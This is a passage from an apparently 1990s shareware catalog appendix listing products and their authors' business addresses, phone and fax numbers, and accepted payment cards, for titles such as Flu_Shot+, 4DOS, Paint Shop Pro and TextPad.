Over_LAZ PS + Author: Herne Data Systems Ltd + Address: PO Box 250, Tiverton, Ontario, CANADA N0G 2T0 + Orders & queries: 519-366-2732 + Accepts: MasterCard, Visa + Fax: 519-366-2732 + + Product: Flu_Shot+ + Author: Software Concepts Design + Address: Virus Acres, New Kingston, NY 12459 + Orders & queries: 914-586-2023 + Accepts: MasterCard, Visa + Fax: 914-586-2025 + + Products: DRIV_MAN, ENVI_MAN, FILE_MAN, LASR_MAN, MENU_MAN, + PATH_MAN, VIEW_MAN + Author: MicroMetric [David Groome] + Address: 98 Dade Avenue, Sarasota, FL 34232-1609 + Orders: 800-929-0184 (orders only, please) + Accepts: + Fax: 813-377-2091 + Queries: 813-377-2515 + + Appendix A, "Author addresses" 648 + + + + Product: PowerBatch + Author: CSD, Inc. + Address: 4437 Ormond Trace, Marietta, GA 30066 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 404-926-9590 + Queries: 404-926-9565 + + Products: Ample Notice, LQ + Author: Granny's Old-Fashioned Software + Address: 297 Camp Rock Road, Boone, NC 28607 + Orders & queries: 704-264-6906 + Fax: 704-264-4634 + + Products: Ahelp Clipper Help Library, BBS Access + Communications, DOS Menu, EZ-Tree, Form Editor (FED), HDM - + Hard Disk Menu, LAN Menu, MicroFox Baseball Statistics, + MicroFox DOS Utilities, PUT, GET, Install Utilities, SEE (File + Viewer) + Author: MicroFox Company [Jim Hass] + Address: 3310 Fox Run, PO Box 447, Richfield, OH 44286-0447 + Orders & queries: 216-659-9489 + Accepts: MasterCard, Visa + Fax: 216-659-9489 + + Product: Bottom Line Accounting + Author: WindSoft International, Inc. [Van B. Hooper, III] + Address: P.O. Box 590006, Orlando, FL 32859-0006 + Orders: 800-542-4405 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 407-240-2323 + Queries: 407-240-2300 + + Appendix A, "Author addresses" 649 + + + + Products: Total Investor for 1-2-3 DOS, Total Investor for + 1-2-3 Window, Total Investor for Symphony + Author: Hughes Financial Services + Address: 2 West Hanover Avenue, Suite 212, Randolph, NJ 07869 + Orders & queries: 201-895-5665 + Fax: 201-895-5525 + + Products: A86 Macro Assembler, ZIPKEY + Author: Eric Isaacson Software + Address: 416 E. University Ave., Bloomington, IN 47401-4739 + Orders & queries: 812-339-1811 + Accepts: American Express, MasterCard, Optima, Visa + + Products: DAYO ACCOUNTS PAYABLE (AP), DAYO ACCOUNTS RECEIVABLE + (AR), DAYO BACK ORDERS (BO), DAYO BAR CODE 3 OF 9, DAYO BILLING + & INVOICING, DAYO END OF PERIOD, DAYO GENERAL LEDGER (GL), DAYO + INDEX, DAYO INVENTORY, DAYO LITTLE POS, DAYO MEMBERSHIP, DAYO + MENU, DAYO MRP, DAYO ORDER ENTRY, DAYO PASSWORDS, DAYO PAYROLL, + DAYO POS (POINT OF SALE), DAYO PRICE BOOK, DAYO QUOTES, DAYO + RENTAL POS, DAYO RETURN MANAGEMENT SYSTEM, DAYO SALES + MANAGEMENT SYSTEM, DAYO SERVICE DISPATCH, DAYO SIMPLE POS, DAYO + SMART REPORTS, DAYO TIME & BILLING + Author: TJS LAB, Inc. + Address: 5104 N. Orange Blossom Trail, #200, Orlando, FL 32810 + Orders: 800-525-3296 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 407-295-2171 + Queries: 407-291-3960 + + Products: Crossword Clipper for DOS, Crossword Clipper for + Windows, Crossword Creator + Author: PC HELP-LINE + Address: 35250 Silver Leaf Circle, Yucaipa, CA 92399 + Orders & queries: 909-797-3091 + Fax: 909-797-3091 + + Products: ALITE, AS-EASY-AS, DRAFT CHOICE, ProtoCAD 3D, + StarFlic + Author: TRIUS, Inc. [David Schulz/Paris Karahalios] + Address: P.O. BOX 249, N. Andover, MA 01845-0249 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 508-688-6381 + Queries: 508-794-9377 + + Appendix A, "Author addresses" 650 + + + + Product: FPLAN-KWIK Financial&Retire Pln + Author: First Financial Software [Ron Kline, CFP, MBA] + Address: P.O. Box 592967, Orlando, FL 32859-2967 + Orders & queries: 800-736-4920 + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: Windows Lotto Pro + Author: Data Solutions + Address: 3805 Hanover Hill Drive, Valrico, FL 33594 + Orders: 800-783-8934 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 813-653-3093 + Queries: 813-651-1246 + + Products: FasType for MS-DOS, FasType for Windows + Author: Trendtech Corporation + Address: P.O. Box 3687, Wayne, NJ 07474-3687 + Orders & queries: 201-694-8622 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 201-694-2543 + + Products: PC-AP, PC-AR, PC-GL, PC-PR, PCINV + Author: Medlin Accounting Shareware + Address: 1461 Sproul Avenue, Napa, CA 94559 + Orders & queries: 707-255-4475 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 707-255-9266 + + Product: The Window BOSS & Data Clerk + Author: Star Guidance Consulting, Inc. [Philip A. Mongelluzzo] + Address: 273 Windy Drive, Waterbury, CT 06705 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 203-755-8842 + Queries: 203-574-2449 + + Products: DMPLAS (Dot Matrix to LaserJet), Fonts Ink Fonts, + GridForm, Layout + Author: Software Co-op + Address: 5437 Honey Manor Dr., Indianapolis, IN 46241 + Orders & queries: 317-856-6052 + Fax: 317-856-2086 + + Products: Easydial, MegaBack Hard Disk Backup, PALERT, PATTR, + PCOPY, PDAILY, PDEL, PPRINT, PSEARCH, PTOUCH, Stowaway True + Archival System + Author: Patri-Soft [Norm Patriquin] + Address: 5225 Canyon Crest Dr., Suite 71-358, Riverside, CA + 92507 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 909-352-1527 + Queries: 909-352-2820 + + Appendix A, "Author addresses" 651 + + + + Products: PrintGF, PrintGL, Ravitz Editor + Author: Ravitz Software Inc. + Address: PO Box 25068, Lexington, KY 40524-5068 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 606-268-0577 + + Products: 4DOS, 4DOS for Windows NT, 4OS2 + Author: JP Software Inc. + Address: PO Box 1470, E. Arlington, MA 02174 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 617-646-0904 + Queries: 617-646-3975 + + Products: VAR Grade, VAR Grade for Windows + Author: VARed Software [Dennis Revie] + Address: 1490 Calle Fidelidad, Thousand Oaks, CA 91360-6819 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 805-523-7546 + + Products: BLANK-IT, BLANK-IT API Specifications, EMERI, RISS + Font Pak #1, RISS Icon Pak, WINPAK #1 + Author: Rhode Island Soft Systems, Inc. + Address: P.O. Box 748, Woonsocket, RI 02895 + Orders: 800-959-7477 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 401-767-3108 + Queries: 401-767-3106 + + Products: Technical Editor (DOS), Technical Editor (OS/2), + Technical Editor (Windows NT), U.S. Geography Tutor + Author: On-Target Software [Michael Russo] + Address: P.O. Box 17355, Irvine, CA 92714 + Orders & queries: 415-474-9973 + Fax: 415-474-9307 + + Product: BOOT.SYS + Author: Salvisberg Software & Consulting [Hans Salvisberg] + Address: Bellevuestr. 18, CH-3095 Berne, SWITZERLAND + Orders: 800-2424-PSL (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +41-31-972-42-10 + + Appendix A, "Author addresses" 652 + + + + Products: AlbumMaster, AlbumMaster For Windows, BitMapZ For + Windows, CassetteMaster, CassetteMaster For Windows, CDMaster, + CDMaster For Windows, DayMaster, DayMaster For Windows, + LessonPlanZ, LessonPlanZ For Windows, OMNIDay, OMNIDay For + Windows, PostCardMaster, ScrollZ, SensuVoX I, ShotZ, SoundZ, + SoundZ For Windows, VideoMaster, VideoMaster For Windows, + Zpeller + Author: Unicorn Software Limited [Charles P. Schell IV] + Address: P.O. Box 117, Knob Noster, MO 65336-0117 + Orders: 800-2424-PSL (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 816-429-3558 + Queries: 816-429-3558 + + Product: Time is Money + Author: Custom Data Solutions [Martin Schiff] + Address: 248 Wood Lake Drive, Maitland, FL 32751 + Orders & queries: 407-767-9278 + Accepts: MasterCard, Visa + + Product: PC-FOOD II FOOD COSTING + Author: SCHRECK SOFTWARE + Address: 1420 Interlachen Circle, Woodbury, MN 55125 + Orders & queries: 612-731-6822 + + Product: EDDY (EDit DirectorY) + Author: John Scofield + th + Address: 117 W. Harrison Bldg., 6 floor, Dept. S-678, + Chicago, IL 60605 USA + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: BATUTIL, STACKEY + Author: CTRLALT Associates + Address: Suite 133, 260 South Lake Ave., Pasadena, CA 91101 + Orders: 800-788-0787 (orders only, please) + Fax: 314-966-1833 + + Products: DOS Summary, DOS Summary (Hypertext), TUTOR.COM + Author: Computer Knowledge + Address: PO Box 91176, Los Angeles, CA 90009-1176 + + Products: CSDIFF, HiMOVE, HiVIDEO, WDiff + Author: C.Sitte Softwaretechnik [Chris Sitte] + Address: A-5322 Hof 320, AUSTRIA + Accepts: American Express, MasterCard, Optima, Visa + + Product: Recon + Author: Amdox Corp. [Orest Skrypuch] + Address: 217 Terrace Hill St., Brantford, ON N3R 1G8 CANADA + Orders: 519-752-5453 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 519-753-7867 + + Appendix A, "Author addresses" 653 + + + + Product: Brother's Keeper + Author: John Steed + Address: 6907 Childsdale, Rockford, MI 49341 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 616-866-3345 + + Products: Calculation Solitaire, Canfield for Windows, + MicroPlayerCD(tm), WinSol Plus, ZiPaper + Author: Daniel Thomas + Address: 2301 North Huron Circle, Placentia, CA 92670 + Queries: 714-524-5625 + + Products: Book Librarian, Household Register, SoundMasterDb, + Video Librarian + Author: TurboSystemsCo [Lemuel D. Turner] + Address: P.O. Box 965368, Marietta, GA 30066 + Orders: 800-257-7221 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 404-591-4988 + Queries: 404-516-8575 + + Products: Jasc Media Center, Paint Shop, Paint Shop Pro, + Professional Capture Systems + Author: JASC, Inc. + Address: PO Box 44997, Eden Prairie, MN 55344 + Orders: 800-622-2793 (orders only, please) + Accepts: MasterCard, Visa + Fax: 612-930-9172 + Queries: 612-930-9171 + + Products: CD-QUICK Cache, PC-ECAP + Author: Circuit Systems + Address: 418 Church Road, Sicklerville, NJ 08081-1727 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 609-875-5433 + + Products: By the Numbers, Citizen, Cliche Finder, Content Label + Rating, Creativity Package, Crystal Ball, Curses!, Fortune + Teller, Geomancy, Kid's Art, Little Lists, Mayan Calendar, + Personal Challenge, Personal Tarot, Poetry Generator, Practical + Joke Collection, Quick Fortunes, Recap, The Richard Webster + System, Solo Peg, Workbase, Wynter Stone's I Ching, Wynter + Stone's Quick Guide, Your ESP Test + Author: R.K. West Consulting [Rosemary K. West] + Address: P.O. Box 8059, Mission Hills, CA 91346 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 818-366-1737 + + Appendix A, "Author addresses" 654 + + + + Product: CMFiler + Author: NoVaSoft + Address: 3239 Riverview Dr., Triangle, VA 22172 + Orders & queries: 703-221-1833 + + Product: MAPIT + Author: Allison Software [John B. Allison] + Address: 166 Shady Lane, Apollo, PA 15613 + Orders & queries: 412-727-2198 + Accepts: MasterCard, Visa + + Product: Lotto Thunder (PICK-6 Version) + Author: Charles P.Staats + Address: P.O. Box 29151, Brooklyn Center, MN 55429 + + Product: DEXTER Text Editor + Author: FAGERLUND CONSULTING + Address: Lonsdale West Postal Outlet, Box 54053, North + Vancouver, B.C., CANADA, V7M 3L5 + Orders & queries: 604-984-7330 + Accepts: MasterCard, Visa + + Products: ARCHIVE TRACKER, ARROW TRACKER, MERIT BADGE TRACKER, + PACK TRACKER, POST TRACKER, RANGER TRACKER, SHIP TRACKER, + TRAINING TRACKER, TROOP TRACKER, TROOP TRACKER 4 GIRLS + Author: Robert Barrentine Consulting + Address: 3211/2 Gorman Avenue, Laurel, MD 20707-4707 + Orders & queries: 301-490-7104 + Fax: 301-490-4168 + + Product: PC Chart + Author: Guru Systems Ltd. [Gene Quong] + Address: 3873 Airport Way, Box 9754, Bellingham, WA 98227 + Orders & queries: 604-299-1010 + Accepts: MasterCard, Visa + Fax: 604-299-1099 + + Products: Diamond Data, On This Day, On This Day for Windows + Author: The Software Construction Co. + Address: PO Box 160, North Billerica, MA 01862-0160 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 508-851-6204 + + Appendix A, "Author addresses" 655 + + + + Product: XED + Author: David L. Dight + Address: P.O. Box 280, Kings Cross, New South Wales 2011 + AUSTRALIA + Orders & queries: +61-2-3314521 + Accepts: + Fax: +61-2-2339393 + + Product: WinCharging + Author: My Little Realm Enterprises + Address: 22 Church Street #103, Suite 376, Ramsey, NJ 07446 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 201-529-8318 + + Product: ClipMate for Windows + Author: Thornton Software Solutions + Address: P.O. Box 26263, Rochester, NY 14626 + Orders & queries: 716-227-6505 + Accepts: MasterCard, Visa + Fax: 716-227-1145 + + Products: Crossdown for Windows, Enigmacross for Windows + Author: Crossdown [Sam Bellotto Jr.] + Address: 133 Akron St., Rochester, NY 14609-7618 + Orders & queries: 716-482-8092 + Fax: 716-482-8092 + + Products: ABcmd, ABmenu, ATTRB, FDplot, HandyDOS + Author: Abri Technologies, Inc. + Address: HC 62, Box 100K, Great Cacapon, WV 25422 + Orders: 304-947-7129 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 304-947-7628 + + Product: PrintEnvelope + Author: Maurer Associates [T. Scott Maurer] + Address: 7324 Native Oak Drive, Irving, TX 75063-8405 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 214-506-0670 + Queries: 214-432-0700 + + Product: Tolman Dental Program + Author: Peter T. Smith D.D.S. + Address: 455 Neighborhood Rd. + Orders & queries: 516-281-5544 + + Products: HOLD-ANYTHING!, NAMEBASE + Author: Elk Creek Software [Michael J. Paulick] + Address: PO Box 935, Conifer, CO 80433-0935 + Orders: 800-242-4775 (orders only, please) + + Appendix A, "Author addresses" 656 + + + + Product: Public Address + Author: Paradise Programming [Chris M. Davies] + th + Address: 3805 85 Ave N.W., Olympia, WA 98502 + Queries: 206-866-3781 + + Product: GammaCAD PRO + Author: Gamma Software + Address: PO Box 8191, Fort Collins, CO 80526 + Orders: 800-747-9960 (orders only, please) + Accepts: MasterCard, Visa + Fax: 970-490-2928 + Queries: 970-490-2928 + + Product: CALC_JNC + Author: James N. Cox + Address: 418 Erie Avenue, Quakertown, PA 18951-1309 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 215-538-7363 + + Products: DaMenu, NeMenu + Author: Just-In-Time Computing Services [John C. Skurka] + Address: P.O. Box 4166 + Orders & queries: 607-539-6609 + Accepts: + Fax: 607-539-6609 + + Products: OLYMPIAD, TRAINER, TRUE MULTIPLE-CHOICE, TRUE + MULTIPLE-CHOICE DOS + Author: Nine-Patch Software [Richard A. Hart, PhD] + Address: Box 161, Maryville, MO 64468-0161 + Accepts: MasterCard, Visa + Fax: 816-582-8589 + Queries: 816-582-7780 + + Products: EZSET, Textshot + Author: McAdams Associates [Craig McAdams] + Address: P.O. Box 835505, Richardson, TX 75083-5505 + Queries: 214-239-9646 + + Product: 4FILES + Author: Hand-Crafted Software [Larry T. Edwards] + Address: Box 6001, Sitka, AK 99835 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 907-747-4801 + Queries: 907-747-8996 + + Appendix A, "Author addresses" 657 + + + + Product: Snooper + Author: Vias and Associates + Address: PO Box 470805, San Francisco, CA 94147-0805 + Orders: 800-332-8234 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 415-922-3197 + Queries: 415-921-6262 + + Products: GradeBook for Windows, R&R School Master for Windows + Author: R&R EdWare [Russell Stevens] + Address: 5191 Pine Grove Dr., Spruce, MI 48762 + Orders: 800-727-2065 (orders only, please) + Accepts: MasterCard, Visa + Queries: 517-727-2066 + + Products: BUDDY: A Tutorial Companion, LEADING AND MANAGING + OTHERS, PoeTrio, POETRY STAR, SNAKE + Author: Chatfield Software, Inc. [Hale Chatfield] + Address: P.O. Box 115, Hiram, OH 44234-0115 + Orders: 800-645-8806 (orders only, please) + Accepts: MasterCard, Visa + Fax: 216-569-5449 + Queries: 216-632-5447 + + Product: Vehicle Costs + Author: Graham Ferguson + Address: 3 Cristata Ave, Endeavour Hills, Vic. 3802 AUSTRALIA + Orders & queries: +61-3-700-3764 + + Products: CUSTOM SCREEN SAVER (WINDOWS), ULTIMATE BACCARAT, + ULTIMATE BLACKJACK, ULTIMATE GIN + Author: Accidental Software + Address: 13245 Skiomah Rd., Apple Valley, CA 92308 + Orders & queries: 619-247-2804 + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: Crush, PocketD Plus + Author: PocketWare [Jeff Rollason] + Address: Box 2369, Hendon, London, NW4 1NR ENGLAND + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: +44-81-203-3731 + + Appendix A, "Author addresses" 658 + + + + Products: INVENTORY & COST CONTROL, RECIPE FILE MANAGEMENT, + RESTAURANT COST CONTROL + Author: First Step Software [Larry Larsen] + Address: 4839 Burlington, Boise, ID 83704 + Orders & queries: 208-376-4411 + Accepts: MasterCard, Visa + Fax: 208-376-4411 + + Products: SMALL BUSINESS ADVISOR, WALL STREET RAIDER + Author: RONIN Software + Address: 3020 Issaquah-Pine Lake Rd. S.E., Suite #36, Issaquah, + WA 98027-7255 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 206-391-4036 + + Product: From Diapers To Diplomas + Author: BlueCollar Software [Bill Sturgell] + Address: 149 Patrick Ave., Urbana, OH 43078 + Queries: 513-652-1353 + + Products: DayLog, Fishtime, Golfhcap, Marnav + Author: C & E Associates [Edward J. Panner] + Address: 119 Placid Drive, Fort Myers, FL 33919 + Orders: 941-482-5863 (orders only, please) + + Product: BIBLOGIC + Author: Biblogic Computer Services [Steve Champion] + Address: PO Box 1424, Thousand Oaks, CA 91358-0424 + Fax: 805-493-0364 + + Product: SCBA Trak + Author: Raymond A.J. Pesek + Address: 4706 Cottonwood Lane, Brunswick, OH 44212-2412 + Queries: 216-225-0248 + + Products: BASASM.LIB, QENV + Author: Annette Cuomo + Address: 3751 Durango St., Chino, CA 91710 + Orders & queries: 909-591-4956 + + Products: MEGA EDIT Editor for Windows, WinNET Mail for MS + Windows + Author: COMPUTER WITCHCRAFT, INC. + Address: 330F Distillery Commons, Louisville, KY 40206 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 502-589-7300 + Queries: 502-589-6800 + + Appendix A, "Author addresses" 659 + + + + Products: ComeBack, GetBack, SpeedBack + Author: MicroTools Inc [Robert J. Japenga] + Address: 714 Hopmeadow St, Suite 14, PO Box 624, Simsbury, CT + 06070 + Orders & queries: 203-651-6170 + Accepts: MasterCard, Visa + Fax: 203-651-0019 + + Product: EnVision Publisher + Author: Software Vision Corporation + Address: P.O. Box 1734, Pinellas Park, FL 34664-1734 + Orders: 800-388-8474 (orders only, please) + Queries: 813-545-4354 + + Products: MathCounts 1+2, MathCounts 3+4, O.R.B.Y. + Author: Able Art Software [Al Walters] + Address: P.O. Box 964, Nelson, B.C. V1L 6A5 CANADA + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 604-229-4766 + + Products: c-scope, FileSafe, JRchive, PC-Fortune + Author: JAYAR Systems + Address: 253 College Street, Suite 263, Toronto, Ontario, + CANADA M5T 1R5 + Accepts: MasterCard, Visa + Queries: 416-751-5678 + th + Products: 6 Sense - DOS 6 Utilities, Artillery Screen Saver, + Back Soon!, Classic Phantoms Screen Saver, Doomsday Screen + Saver, MARGARINE, PictureClock, Power C Shell, S.O.S. Personal + Edition, Space Explorer Screen Saver, STEENBURGH's STUFF + Author: Tay-Jee Software Corporation [Chuck Steenburgh] + Address: P.O. Box 835, Lexington, VA 24450-0835 + Orders: 800-378-3966 (orders only, please) + Accepts: MasterCard, Visa + Fax: 540-464-4210 + Queries: 540-464-4310 + + Product: QBALL + Author: Benjamin W. Hartley + Address: Forest Park Estates #103, Jaffrey, NH 03452 + + Product: CODE-A-LINE + Author: Optimax Corporation + Address: P.O. Box 25447, Chicago, IL 60625-9998 + Fax: 312-561-6363 + Queries: 312-561-6363 + + Appendix A, "Author addresses" 660 + + + + Products: DBKIT, Hands On Remote Control/Access, Open Menu, + Teleshare/DOS Remote Access + Author: P. C. Softsmith [Vic Williams] + Address: 606 6455 Willingdon Ave, Burnaby, BC, V5H 4E4 CANADA + Orders & queries: 604-433-5189 + + Product: XYSee + Author: Insight Advantage + Address: 4509 Yellowleaf Dr., Fort Worth, TX 76133 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 817-346-9116 + + Products: FeeRate for Windows, FeeRate for Windows 95 / NT, + Pulsar for Windows + Author: Tesserax Information Systems + Address: 18796 Academy Circle, Huntington Beach, CA 92648-1514 + Orders & queries: 714.841.0616 + Fax: 714.841.0091 + + Products: DOC DEFIANT, MATH CHALLENGE + Author: Just For Me Software, Inc. + Address: P.O. Box 531, Novi, MI 48376 + Queries: 810-348-6697 + + Product: Home Plan + Author: Home Plan [Chuck Herndon] + Address: 6890 Rimrock Valley Rd., Mountain Ranch, CA 95246 + Orders: 800-671-7526 (orders only, please) + Accepts: MasterCard, Visa + Fax: 209-754-3737 + Queries: 209-754-4891 + + Products: DizView, FileMod, First Impression, Palette Adjuster, + Vending Machine + Author: Lincoln Beach Software [Harold Holmes] + Address: PO Box 1554, Ballwin, MO 63022-1554 + Orders: 800-242-4775 (orders only, please) + Accepts: MasterCard, Visa + Fax: 314-861-1500 + Queries: 314-861-1500 + + Appendix A, "Author addresses" 661 + + + + Products: ANNUITY ACE, Crossword Construction Kit, Debt + Analyzer for Windows, Keyboard Express, LOAN CHIEF, THE + MORTGAGE ANALYZER, SmartTracker Books, SmartTracker Coins, + SmartTracker Inventory, SmartTracker Stamps, SmartTracker + Videos, Word Search Construction Kit, Word Search Rampage, Word + Wrestle, Zip Express + Author: Insight Software Solutions, Inc. [Michael D. Jones] + Address: P.O. Box 354, Bountiful, UT 84011-0354 + Orders & queries: 801-295-1890 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 801-299-1781 + + Product: Bingo Text Editor + Author: Sunderland Software + Address: PO Box 2563, Columbia, MD 21045 + Orders & queries: 410-379-9019 + Accepts: MasterCard, Visa + + Products: THE CALLING TREE, PUBLIC ACCESS(tm) + Author: IN/QUEST, LLC [Jim Turner] + Address: 3140 South Peoria St, K-200, Aurora, CO 80014-3155 + Orders & queries: 303-671-0800 + Accepts: MasterCard, Visa + Fax: 303-688-0188 + + Product: DR. FORM + Author: IrwinWare [Russ Irwin] + Address: 113 Beechmont Ave., Pittsburgh, PA 15229 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 412-931-8442 + Queries: 412-931-9577 + + Products: TC's Personal Data Manager, TC's Toolbox + Author: Specific Applications Software [Timothy W. Carlson] + Address: P.O. Box 6146, Minneapolis, MN 55406-0146 + Orders: 800-242-4775 (orders only, please) + Queries: 612-722-9659 + + Appendix A, "Author addresses" 662 + + + + Product: Fixed Asset Pro + Author: HammerSoft, Inc. + Address: P.O. Box 205, Kansas, OH 44841 + Orders & queries: 419-986-6007 + Accepts: MasterCard, Visa + Fax: 419-986-6007 + + Product: Hebrew Edit + Author: Right to Left Software + Address: 3332 Yonge Street, #94034, Toronto Ont. M4N-3R1 + CANADA + Orders & queries: 416-489-7440 + Fax: 416-489-6654 + + Product: Portfolio Manager + Author: Shane Software International [Steven C. Hane] + th + Address: 107 17 Court, Sequim, WA 98382-9350 + Orders: 800-742-6303 (orders only, please) + Accepts: MasterCard, Visa + Queries: 360-681-2402 + + Product: From Scratch recipe processor + Author: Desktop Solutions [Frank Imburgio] + Address: 26 Cecily Lane, Commack, NY 11725 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 516-493-3422 + Queries: 516-493-3422 + + Products: PC-Proof, WinProof + Author: Intellect Systems + Address: P.O. Box 58213, Renton, WA 98058 + Orders & queries: 206-226-0429 + + Products: Bookbild/DOS Pamphlet Publisher, Bookbild/Win + Pamphlet Publisher, Graphcat/DOS Clip Art Cataloger, Graphcat/ + Win Clip Art Cataloger, The Letterhead Kit-32/Win, The + Letterhead Kit/DOS, The Letterhead Kit/Win + Author: Science Translations Software Services [Jerry Stern] + Address: PO Box 20234, Baltimore, MD 21284-0234 + Orders & queries: 410-661-2224 + Accepts: American Express, MasterCard, Optima, Visa + Fax: 410-661-2224 + + Products: OWShare - Delphi, OWShare - VB, WinFlash, WinJottr, + WinKillr, WinPrice, WinUpD8R + Author: Open Windows [Richard W. Bryant] + Address: PO Box 49746, Colorado Springs, CO 80949-9746 + Orders: 800-531-0403 (orders only, please) + Accepts: MasterCard, Visa + Fax: 719-531-0403 + Queries: 719-531-0403 + + Appendix A, "Author addresses" 663 + + + + Product: Judy's TenKey + Author: Judy's Applications [Daniel E. Stickel] + Address: 2464 El Camino Real, Suite #125, Santa Clara, CA + 95051 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 408-244-0744 + + Products: Clickometer, A Project/Event Planner + Author: Sapphire Software Inc. + Address: 6650 Hawaii Kai Drive, Suite 219, Honolulu, HI 96825 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 808-395-5587 + + Products: QRead, QRead for Windows 95 + Author: DS Products [Daniel Scavezze] + Address: P.O. Box 342, Westford, MA 01886 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: Above & Beyond + Author: 1Soft Corp. + Address: PO Box 1320, Middletown, CA 95461 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 707-987-3150 + Queries: 707-987-0256 + + Products: THE FEELING'S MUTUAL-DOS, THE FEELING'S MUTUAL- + Macintosh, THE FEELING'S MUTUAL-WINDOWS + Author: Interpretive Software Inc. [Stu James] + Address: 1932 Arlington Blvd, Suites 107-109, Charlottesville, + VA 22903 + Orders: 800-746-8587 (orders only, please) + Accepts: MasterCard, Visa + Fax: 804-979-2454 + Queries: 804-979-0245 + + Products: TextPad 16, TextPad 32 + Author: Helios Software Solutions + Address: Carr Brook Hse, Chorley Old Rd, Brindle, Chorley PR6 + 7QZ ENGLAND + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + st + Products: 1 &goal Fantasy Football, FastBreak Fantasy + Basketball, Keyboard Coach Fantasy Football, LineDrive Fantasy + Baseball + Author: McS Custom Software + Address: PO Box 1032, Fortuna, CA 95540 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 707-725-6016 + + Appendix A, "Author addresses" 664 + + + + Product: FSLOGIN + Author: Confirm + Address: Ardechelaan 35, 6904 NG Zevenaar, THE NETHERLANDS + Orders: +31-8360-24988 (orders only, please) + Fax: +31-8360-41580 + + Products: clySmic Icon Bar, clySmic Lunar Almanack, clySmic + Win32 Utilities, Lunar Taskbar Almanack, Papers, VPT + Author: clySmic Software + Address: PO Box 2421, Albany, NY 12220 + Orders: 800-2424-PSL (orders only, please) + Accepts: Discover, MasterCard, Visa + Fax: 518-458-7476 + + Products: Personal Schedule, Variable Investment Analyst + Author: Will Baldwin + Address: 1807 Campbell, #11, Joplin, MO 64801 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 417-626-9109 + Queries: 417-626-9109 + + Product: Builder + Author: Aeolus Software + Address: P.O. Box 11915, St. Paul, MN 55119-0915 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 715-386-4182 + Queries: 612-730-4135 + + Products: File Maven, Puffer + Author: Kent Briggs + Address: 109A Romana Circle, Hewitt, TX 76643 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: Drag and Drop Printing + Author: FLFSoft Inc. + Address: P.O. Box 306, Oak Creek, WI 53154-0306 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Appendix A, "Author addresses" 665 + + + + Products: The Deer Expert, The Fish Expert, Program for a Small + Planet + Author: Strat-Tech, Inc. + Address: P.O. Box 1957, Milwaukee, WI 53201 + Orders & queries: 800-783-9544 + 